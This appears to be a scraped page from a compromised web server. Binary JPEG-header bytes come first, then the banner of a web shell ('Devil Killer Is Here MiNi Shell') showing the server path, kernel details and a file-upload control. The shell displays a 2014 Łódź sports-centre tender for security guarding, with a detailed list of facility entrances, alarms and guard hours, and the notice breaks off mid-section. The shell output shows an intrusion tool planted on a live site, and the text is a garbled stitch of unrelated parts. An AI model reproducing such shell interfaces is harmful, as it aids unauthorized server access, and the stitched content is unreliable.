JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141208/253995-N-2014.html

<p class="kh_header"><b>Łódź: OCHRONA OBIEKTÓW MOSIR</b><br>
<b>Numer ogłoszenia: 253995 - 2014; data zamieszczenia: 08.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Ks. Skorupki 21, 90-532 Łódź, woj. łódzkie, tel. 42 27 21 417, faks 42 6367980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OCHRONA OBIEKTÓW MOSIR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Ochrona obiektów MOSiR, świadczenie usług ochrony osób i mienia realizowanych w formie ochrony obiektów Miejskiego Ośrodka Sportu i Rekreacji w Łodzi zgodnie z poniższym wykazem, a także Świadczenie usługi monitorowania sygnałów alarmowych:

Część 1.
1.	Opis obiektów do ochrony fizycznej osób i mienia
Hala Sportowa Wielofunkcyjna - ul. ks. Skorupki 21
1.	Opis obiektu:
Opis obiektu
a) wejście główne - 1 szt., brama wjazdowa, 22 szt. drzwi wejściowych bocznych (antypanicznych), 4 szt. drzwi awaryjnych, 3 szt. drzwi wejściowych do pomieszczeń biurowych i warsztatowych, 1 szt. wejście do lokalu mieszkalnego. Hala sportowa nieogrodzona, oświetlona, zamontowany system monitoringu wizyjnego obejmujący parter hali sportowej oraz jej bezpośrednie otoczenie.
b) Budynek gospodarczy na zapleczu ul. Stefanowskiego 21
- budynek ogrodzony i oświetlony
- bramy wjazdowe na teren zaplecza - 2 szt.
- lokal mieszkalny
Zakres zlecenia
a) udzielanie pełnej informacji o imprezach odbywających się w obiekcie,
b) wydawanie kluczy zgodnie z upoważnieniami, prowadzenie kontrolki wydawanych i zdawanych kluczy od pomieszczeń,
c) obchód obiektu po zakończeniu pracy obiektu ze szczególnym zwróceniem uwagi na pokoje: MOSiR, Wydziału Zamówień Publicznych UMŁ, Wydziału Sportu UMŁ, Muzeum Sportu, kontrahentów, pomieszczenia magazynowe i sanitarne, klatki schodowe, korytarze, itd.
d) zamknięcie wyznaczonych przejść po zakończeniu pracy Wydziału Zamówień Publicznych, Wydziału Sportu i MOSiR,
e) sprawdzenie zamknięcia bramy wjazdowej, drzwi wejściowych i awaryjnych, okien, pomieszczeń,
f) obsługa systemu monitoringu wizyjnego,
g) zabezpieczenie poboru gotówki na kiermaszu działkowca (praca na zewnątrz z pracownikiem MOSiR, w soboty i niedziele, w godzinach 9-13, w okresie wiosenno-jesiennym)
h) zamknięcie i zakodowanie obiektu lodowisko Bomobnierka po zakończeniu pracy obiektu.

Pływalnia Wodny Raj - ul. Wiernej Rzeki 2

Opis obiektu
- ilość budynków - 2
- ilość wejść - budynek główny: 3 wejścia (główne, służbowe - podbasenie, awaryjne)
                     - budynek pływalni odkrytej: 2 wejścia 
- ogrodzenie i oświetlenie - cały teren tj. parking, skatepark, pływalnia odkryta jest ogrodzona i w pełni oświetlony, wyposażony w monitoring wizyjny
- bramy - 1 brama wjazdowa na parking i 1 brama wjazdowa na pływalnię letnią (z parkingu)
Miejsce kontaktu z ochroną - szatnia pływalni krytej
Zakres zlecenia:
- obsługa szatni pływalni krytej
- przyjmowanie opłat i rozliczanie się z zagubionych numerków do szatni
- przyjmowanie i przechowywanie depozytu
- zamknięcie i otwarcie bramy wjazdowej i furtki na parking, drzwi wejściowych
- dozór parkingu i skateparku 
- udzielanie informacji o pracy obiektu i imprezach odbywających się na jego terenie
- ochrona lodowiska w okresie jego funkcjonowanie lodowiska - nocna zmiana przebywa na  
  terenie lodowiska - kontener socjalny
 
Pływalnia Promienistych - ul. Głowackiego 10/12
Opis obiektu
Położenie w parku o tej samej nazwie przy ulicy Głowackiego 10/12.
Obiekt ogrodzony posiada trzy bramy wjazdowe zamykane na czas przerwy w pracy obiektu. Budynek socjalny posiada wejście główne od strony ul. Głowackiego oraz trzy wejścia od strony basenu (w tym dwa chronione). Od strony północnej znajduje się Pizzeria ulokowana w części budynku socjalnego posiada niezależny wjazd i furtkę. Od strony wjazdu do Pizzerii są dwa wejścia do budynku socjalnego (w tym jedno chronione). Oprócz budynku socjalnego w terenie ogrodzonym znajduje się: brodzik, zjeżdżalnia, przenośne lodowisko i budynek techniczny z jednym wejściem od strony pływalni oraz dwoma wejściami do pomieszczeń gospodarczych. Całość ogrodzonego terenu jest oświetlona i wyposażona jest w 14 czujek zbliżeniowych połączonych drogą radiową z syreną alarmową oraz systemem zewnętrznego monitoringu. 
Zakres zlecenia:
- ochrona pasywna: dotyczy dozorców pracujących poza godzinami pracy lodowiska przenośnego.: kontrola i obserwacja terenu, obiektów chronionych, zabezpieczeń zamontowanych, instalacji technicznych przed zamrożeniem czy rozmrożeniem oraz inne typowe dla dozorowania czynności.
- współpraca z gospodarzem obiektu, grupą interwencyjną, Strażą Miejską, Policją.
-	powiadomienie telefoniczne o zdarzeniach, próbach włamania itp. Kierownika obiektu oraz odpowiednich służb. 
-	w przypadku fałszywego alarmu, sprawdzenie budynku z zewnątrz - obchód po terenie.
-	gotowość grup interwencyjnych do reakcji na wypadek włamań i napadów.

Lodowisko Bombonierka - ul. Stefanowskiego 28
Opis obiektu
Budynek.
wejście główne 1 szt.
wyjścia ewakuacyjne 3 szt.
wejście do maszynowni 1 szt.
wejście do węzła cieplnego 1 szt.
wejście do lokalu gastronomicznego  z zewnątrz 1 szt.
Budynek oświetlony, częściowo ogrodzony (od strony szpitala)
Zakres zlecenia: 
-	monitorowanie systemu alarmowego obiekt,
-	zamknięcie pomieszczeń, okien, drzwi wejściowych i awaryjnych, wygaszanie świateł po zakończeniu treningów,
-	powiadomienie telefoniczne o zdarzeniach, próbach włamania itp. Kierownika obiektu oraz odpowiednich służb,
-	w przypadku fałszywego alarmu, sprawdzenie budynku z zewnątrz - obchód po terenie,
-	gotowość grup interwencyjnych do reakcji na wypadek włamań i napadów,

Lodowiska Przenośne -lokalizacje 
Obiekt rekreacyjno-wypoczynkowy Stawy Jana 
Obiekt pływalnia Wodny Raj

Opis obiektu
A/. Budynek - kontener
B/. Wejście - 1
C/. Teren ogrodzony i oświetlony 
D/. Bram wjazdowych - 1 
Zakres zlecenia
- 	ochrona całego obiektu 
- 	przeciwdziałanie próbom kradzieży mienia MOSiR 
-	przejmowanie stanu wyposażenia w pomieszczeniu kontenerowym (łyżwy, sprzęt nagłaśniający, kasa fiskalna itp.) od pracownika MOSiR, oraz przekazywanie przed rozpoczęciem zajęć lodowiska i potwierdzanie podpisami
-	sprawdzanie zamknięcia pomieszczenia kasy
-	sprawdzanie zamknięcia bramy wjazdowej
-	wygaszanie zbędnego oświetlenia pomieszczeń i urządzeń elektrycznych
-	kontakt z przedstawicielem MOSiR i innymi służbami na bieżąco - telefoniczny po godz. pracy.

Obiekt rekreacyjno-wypoczynkowy Stawy Jana - ul. Rzgowska 247
Opis obiektu
Na terenie obiektu znajdują się:
1.	pole namiotowe
2.	przystań wodna
3.	budynek gospodarczy (estrada)
4.	Plac zabaw
5.	Ścieżka zdrowia
6.	Boisko wielofunkcyjne orlik (monitorowane)
7.	skatepark
8.	zaplecze sportowe (szatnie w budynku murowanym), 
9.	boiska do piłki plażowej
10.	szalet w parku 
Przystań wodna:
- teren ogrodzony w całości, oświetlony. Jedno wejście, jedna brama wjazdowa.
Plac zabaw - teren nieogrodzony
Ścieżka zdrowia - teren nieogrodzony
Boisko wielofunkcyjne orlik teren ogrodzony, oświetlony, monitorowany 1 brama wjazdowa 2 furtki.
Skatepark - teren nieogrodzony.
Zakres zlecenia
- dozór pola namiotowego, przystani, boiska wielofunkcyjnego Orlik, skateparku, w okresie zimowym sztucznego lodowiska, które jest zlokalizowane na terenie pola namiotowego,
- dozór ciągnika rolniczego, garaży i wiat ze sprzętem ogrodniczym,
- sprawdzanie zamknięcia poszczególnych pomieszczeń, wygaszanie świateł.

Hala Sportowa Wielofunkcyjna - ul. Małachowskiego 7
Opis obiektu:
1. Hala sportowa wielofunkcyjna:
a) wejście główne - 1 szt (antypaniczne)., 1 szt. drzwi wejściowych bocznych (antypanicznych), 2 szt. drzwi awaryjnych, Hala sportowa nieogrodzona, oświetlona, zamontowany system monitoringu wizyjnego obejmujący salę główną hali sportowej, hol wejściowy korytarz przy szatniach oraz 2 parkingi.
Zakres zlecenia
przejmowanie i zdawanie obiektu pracownikowi dyżurnemu hali.
obchód obiektu po zakończeniu pracy obiektu ze szczególnym zwróceniem uwagi na pomieszczenia biurowe, pomieszczenia magazynowe i sanitarne, klatki schodowe, korytarze, itd.
sprawdzenie zamknięcia drzwi wejściowych i awaryjnych, okien, pomieszczeń,
obsługa systemu monitoringu wizyjnego,

Motodrom - ul. Małachowskiego 
Opis obiektu:
1.	Budynek szkoleniowy. Teren ogrodzony w całości i oświetlony. 
Na terenie Miasteczka znajdują się ścieżki rowerowe i chodniki z kostki brukowej znaki drogowe i sygnalizatory świetlne.

Stadion Piłkarski - ul. Małachowskiego
Opis obiektu 
Na terenie obiektu znajdują się:
1.	budynek gospodarczy 
2.	budynek sanitarno-szatniowy Skopje
3.	budynek sanitarno-szatniowy Orlik
4.	boisko główne do piłki nożnej
5.	boisko Orlik
6.	boisko do piłki plażowej siatkowej
7.	boisko do piłki plażowej nożnej
8.	korty tenisowe (ogrodzone )

Ilość bram:
1.	brama główna od strony ul. Małachowskiego

Teren obiektu jest ogrodzony i oświetlony.

Zakres zlecenia:
a) - ochrona pasywna: dotyczy dozorców pracujących poza godzinami pracy obiektu.: kontrola i obserwacja terenu, boiska wielofunkcyjnego Orlik, budynków szatniowo-sanitarnych oraz kortów tenisowych.
- sprawdzanie zamknięcia poszczególnych pomieszczeń, wygaszanie świateł.
- sprawdzanie zamknięcia bramy wjazdowej
b) Współpraca z gospodarzem obiektu, grupą interwencyjną, Strażą Miejską, Policją.



Liczba godzin pracy pracowników ochrony:
1.	Hala Sportowa Wielofunkcyjna - ul. ks. Skorupki 21		- godziny pracy od poniedziałku do piątku w godzinach 19:00 - 07:00, od piątku od godziny 19:00 do poniedziałku całodobowo - 6312 godzin.
2.	Pływalnia Wodny Raj - ul. Wiernej Rzeki 2			- godziny pracy całodobowo x 365 dni - 8760 godzin.
3.	Pływalnia Promienistych - ul. Głowackiego 10/12		- godziny pracy 11 godzin w godzinach od 20:00 - 07:00 x 73 dni - 803 godziny
4.	Lodowisko Bombonierka - ul. Stefanowskiego 28		- godziny pracy w godzinach 22:00 - 06:00 - 2184 godziny.
5.	Lodowiska Przenośne -lokalizacje 
		Obiekt rekreacyjno-wypoczynkowy Stawy Jana 
		Obiekt pływalnia Wodny Raj
6.	Obiekt rekreacyjno-wypoczynkowy Stawy Jana - ul. Rzgowska 247		- godziny pracy od poniedziałku do piątku w godzinach 22:00 - 08:00 x 252 dni, soboty niedziele i święta w godzinach 22:00 - 14:00 x 16 godzin x 113 dni, dodatkowo w święta wolne od pracy dozór całodobowy  - 4408 godzin.
7.	Hala Sportowa Wielofunkcyjna - ul. Małachowskiego 7		- godziny pracy w dni robocze 9 godzin od 22:00-do 07:00 w weekendy i święta 24 godziny - 4980 godzin.
8.	Motodrom - ul. Małachowskiego		- godziny pracy w dni robocze 16 godzin od 16:00-do 08:00 w weekendy i święta 24 godziny - 6744 godzin.
9.	Stadion Piłkarski - ul. Małachowskiego		- godziny pracy 9 godzin od maja do czerwca w godzinach 22:00-07:00 - 1377 godzin.

Zamawiający może każdorazowo zmienić godziny pracy pracowników ochrony.

Na każdym z obiektów wymagana jest praca przez jednego pracownika dozoru
Łączna liczba godzin 35.568.
Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 50 % usług podstawowych tj. 17.700 godzin.

Część 2
2.	Opis obiektów do ochrony fizycznej osób i mienia przez pracowników kwalifikowanych
Pływalnia Wodny Raj - ul. Wiernej Rzeki 2

Opis obiektu
- ilość budynków - 2
- ilość wejść - budynek główny: 3 wejścia (główne, służbowe - podbasenie, awaryjne)
                     - budynek pływalni odkrytej: 2 wejścia 
- ogrodzenie i oświetlenie - cały teren tj. parking, skatepark, pływalnia odkryta jest ogrodzona i w pełni oświetlony, wyposażony w monitoring wizyjny
- bramy - 1 brama wjazdowa na parking i 1 brama wjazdowa na pływalnię letnią (z parkingu)
Miejsce kontaktu z ochroną - szatnia pływalni krytej
Zakres zlecenia:
- udzielanie informacji o pracy obiektu i imprezach odbywających się na jego terenie
- ochrona lodowiska w okresie jego funkcjonowanie lodowiska - nocna zmiana przebywa na  
  terenie lodowiska - kontener socjalny
 
Pływalnia Promienistych - ul. Głowackiego 10/12
Opis obiektu
Położenie w parku o tej samej nazwie przy ulicy Głowackiego 10/12.
Obiekt ogrodzony posiada trzy bramy wjazdowe zamykane na czas przerwy w pracy obiektu. Budynek socjalny posiada wejście główne od strony ul. Głowackiego oraz trzy wejścia od strony basenu (w tym dwa chronione). Od strony północnej znajduje się Pizzeria ulokowana w części budynku socjalnego posiada niezależny wjazd i furtkę. Od strony wjazdu do Pizzerii są dwa wejścia do budynku socjalnego (w tym jedno chronione). Oprócz budynku socjalnego w terenie ogrodzonym znajduje się: brodzik, zjeżdżalnia, przenośne lodowisko i budynek techniczny z jednym wejściem od strony pływalni oraz dwoma wejściami do pomieszczeń gospodarczych. Całość ogrodzonego terenu jest oświetlona i wyposażona jest w 14 czujek zbliżeniowych połączonych drogą radiową z syreną alarmową oraz systemem zewnętrznego monitoringu. 
Zakres zlecenia:
- ochrona pasywna: dotyczy dozorców pracujących poza godzinami pracy lodowiska przenośnego.: kontrola i obserwacja terenu, obiektów chronionych, zabezpieczeń zamontowanych, instalacji technicznych przed zamrożeniem czy rozmrożeniem oraz inne typowe dla dozorowania czynności.
- współpraca z gospodarzem obiektu, grupą interwencyjną, Strażą Miejską, Policją.
-	powiadomienie telefoniczne o zdarzeniach, próbach włamania itp. Kierownika obiektu oraz odpowiednich służb. 
-	w przypadku fałszywego alarmu, sprawdzenie budynku z zewnątrz - obchód po terenie.
-	gotowość grup interwencyjnych do reakcji na wypadek włamań i napadów.

1.	Pływalnia Wodny Raj - ul. Wiernej Rzeki 2		godziny pracy 8 godzin x 2 pracowników x 80 dni - 1.280 godzin.
2.	Pływalnia Promienistych - ul. Głowackiego 10/12		godziny pracy 10 godzin x 2 pracowników x 73 dni - 1.460 godziny

Łączna liczba godzin 2.740.

Część 3
1.	Montaż nadajników GSM na obiektach wskazanych poniżej włączone do systemu ochrony Wykonawcy i świadczenie usługi ochrony mienia za pomocą systemu monitorującego:

Hala Sportowa Wielofunkcyjna przy ul. ks. Skorupki 21
Obiekt sportowy Karpacka ul. Karpacka 61
Lodowisko Bombonierka przy ul. Stefanowskiego 28
Lodowisko Retkinia przy ul. Popiełuszki 13B
Obiekt sportowy Energetyk przy ul. Srebrzyńskiej 95
Obiekt rekreacyjno-wypoczynkowy Stawy Stefańskiego przy ul. Wirowej 7a
Obiekt sportowy przy ul. Potokowej
Obiekt sportowy przy ul. Minerska
Pływalnia przy ul. Sobolowej

2.	Świadczenie usługi ochrony mienia za pomocą systemu monitorującego obiekt poprzez zamontowanie na obiektach wskazanych poniżej czujek ruchowych i nadajników GSM stanowiących własność Wykonawcy:

Opis obiektów:

Hala Sportowa Wielofunkcyjna - ul. ks. Skorupki 21
2.	Opis obiektu:
Opis obiektu
a) wejście główne - 1 szt., brama wjazdowa, 22 szt. drzwi wejściowych bocznych (antypanicznych), 4 szt. drzwi awaryjnych, 3 szt. drzwi wejściowych do pomieszczeń biurowych i warsztatowych, 1 szt. wejście do lokalu mieszkalnego. Hala sportowa nieogrodzona, oświetlona, zamontowany system monitoringu wizyjnego obejmujący parter hali sportowej oraz jej bezpośrednie otoczenie.
b) Budynek gospodarczy na zapleczu ul. Stefanowskiego 21
- budynek ogrodzony i oświetlony
- bramy wjazdowe na teren zaplecza - 2 szt.
- lokal mieszkalny

Obiekt Sportowy Karpacka - ul. Karpacka 61
Opis obiektu
Na terenie obiektu znajdują się:
-	hala sportowa 
-	budynek gospodarczy 
-	budynek biurowy
-	budynek sanitarno-szatniowy (ogrodzony i oświetlony)
-	boisko Orlik
-	skatepark
-	antywandal
-	boisko do piłki plażowej

Opis budynków:
-	hala sportowa: wejście główne i boczne wrota, dodatkowe wejście przez warsztat i kawiarnię.
-	budynek gospodarczy (szatnie piłkarskie): 4 szatnie, garaż, 2 pomieszczenia gospodarcze
-	budynek biurowy osobne wejście do każdego pomieszczenia:
Ilość bram:
-	brama główna od strony ul. Karpackiej
-	brama awaryjna od ul. Rymanowskiej
-	brama od strony ul. Karpackiej prowadząca na skatepark
Teren obiektu jest ogrodzony i oświetlony.

Pływalnia Promienistych - ul. Głowackiego 10/12
Opis obiektu
Położenie w parku o tej samej nazwie przy ulicy Głowackiego 10/12.
Obiekt ogrodzony posiada trzy bramy wjazdowe zamykane na czas przerwy w pracy obiektu. Budynek socjalny posiada wejście główne od strony ul. Głowackiego oraz trzy wejścia od strony basenu (w tym dwa chronione). Od strony północnej znajduje się Pizzeria ulokowana w części budynku socjalnego posiada niezależny wjazd i furtkę. Od strony wjazdu do Pizzerii są dwa wejścia do budynku socjalnego (w tym jedno chronione). Oprócz budynku socjalnego w terenie ogrodzonym znajduje się: brodzik, zjeżdżalnia, przenośne lodowisko i budynek techniczny z jednym wejściem od strony pływalni oraz dwoma wejściami do pomieszczeń gospodarczych. Całość ogrodzonego terenu jest oświetlona i wyposażona jest w 14 czujek zbliżeniowych połączonych drogą radiową z syreną alarmową oraz systemem zewnętrznego monitoringu. Wykonawca zobowiązany jest do zamontowania nadajnika GSM i monitorowanie sygnałów alarmowych.

Lodowisko Bombonierka - ul. Stefanowskiego 28
Opis obiektu
-	Budynek.
wejście główne 1 szt.
wyjścia ewakuacyjne 3 szt.
wejście do maszynowni 1 szt.
wejście do węzła cieplnego 1 szt.
wejście do lokalu gastronomicznego  z zewnątrz 1 szt.
Budynek oświetlony, częściowo ogrodzony (od strony szpitala)


Lodowisko Retkinia - ul. Popiełuszki 13 b
Opis obiektu
Budynek wolnostojący ogrodzony.
-	ilość czujek zamontowanych w pomieszczeniach z oknami lub drzwiami wychodzących na zewnątrz budynku -24 szt.
-	ilość wejść do budynku 6 szt.
-	bramy wjazdowe 3 szt.



Obiekt rekreacyjno-wypoczynkowy Stawy Stefańskiego - ul. Wirowa 7 a

Opis obiektu
Na posesji przy ul. Wirowej 7a znajduje się budynek warsztatowy. Dwa wejścia z uwzględnieniem drzwi awaryjnych, teren posesji jest ogrodzony siatką metalową i posiada oświetlenie zewnętrzne, trzy bramy wjazdowe na teren ośrodka.
Od strony ul. Patriotycznej 3 znajduje się przystań z infrastrukturą, budynkiem i kąpieliskiem oraz budynek barowy.
Trzy wejścia z uwzględnieniem drzwi awaryjnych, teren przystani z pomostami cumowniczymi i budynkiem przystaniowym ogrodzony z trzech stron płotem metalowym z siatki, z czwartej strony ograniczony taflą wodną stawu. Budynek barowy stoi w odległości ok. 10 m od budynku przystani poza terenem ogrodzonym. Jedna brama wjazdowa na teren ośrodka. 
Zakres zlecenia
Należy zamontować system czujek zbliżeniowych (zewnętrznych - 3 szt., wewnętrznych - 4 szt.) połączone drogą radiową z syreną alarmową oraz systemem zewnętrznego monitoringu. System alarmowy uruchamiany poprzez klawiaturę numeryczną. Na obiekcie pozostało okablowanie.
Należy zamontować system czujek zbliżeniowych przy ul. Wirowej

Obiekt sportowy Energetyk - ul. Srebrzyńska 95
Opis obiektu:
Na terenie obiektu znajduje się jeden budynek między bramą wjazdową a furtką, dwa namioty gospodarcze, 2 boiska piłkarskie.
Teren ogrodzony, posiada 1 furtkę, 1 bramę wjazdową, 2 bramy wjazdowe nieużytkowane.
Oświetlenie budynku uruchamiane z budynku.
Na terenie obiektu organizowane są imprezy sportowe i treningi 
Zakres zlecenia
Obiekt posiada zamontowany system czujek zbliżeniowych (wewnętrznych 12 szt.) połączonych drogą radiową z syreną alarmową oraz systemem zewnętrznego monitoringu. System alarmowy uruchamiany poprzez klawiaturę numeryczną.

Obiekt Sportowy, przy ul. Potokowej
Opis obiektu:
Na terenie obiektu znajduje się:
Budynek szatniowy dwukondygnacyjny, boisko piłkarskie, boisko poliuretanowe wielofunkcyjne, bieżnia czterotorowa poliuretanowa.
System wyposażony w system czujek zbliżeniowych i 3 szt. kamer zewnętrznych 

Obiekt Sportowy, przy ul. Minerskiej
Opis obiektu:
Na terenie obiektu znajduje się:
Stadion piłkarski, kontenery szatniowe.

Pływalnia odkryta - ul. Sobolowa 1
Opis obiektu
1.	Budynek dwukondygnacyjny murowany. Szatnie, natryski, korytarze, pomieszczenia magazynowe.
Budynek drewniany jednokondygnacyjny - sauna.
Niecka basenowa.
Teren w całości ogrodzony. 
2.	Miejscem kontaktu z ochroną jest pomieszczenie w budynku socjalnym - recepcja.
3.	Zakres zlecenia:
a) ochrona pasywna: dotyczy dozorców pracujących poza godzinami pracy pływalni.: kontrola i obserwacja terenu, obiektów chronionych, zabezpieczeń
zamontowanych, instalacji technicznych przed zamrożeniem czy rozmrożeniem oraz inne typowe dla dozorowania czynności.
b) Współpraca z gospodarzem obiektu, grupą interwencyjną, Strażą Miejską, Policją.
Minimalny czas pracy ochroniarzy na obiekcie pływalni
Pracownicy ochrony bez licencji - ochrona obiektu całodobowo.


UWAGA:
System monitoringu musi działać na zasadzie sygnału wysyłanego z nadajnika GSM (należy zamontować na tych obiektach, na których wskazany jest montaż) do centrum monitorowania Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać aktualną koncesję na prowadzenie działalności gospodarczej w zakresie świadczenia usług ochrony osób i mienia, zgodnie z ustawą z dnia 22 VIII 1997 r. o ochronie osób i mienia (Dz. U. z 2014 r. poz. 1099).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1
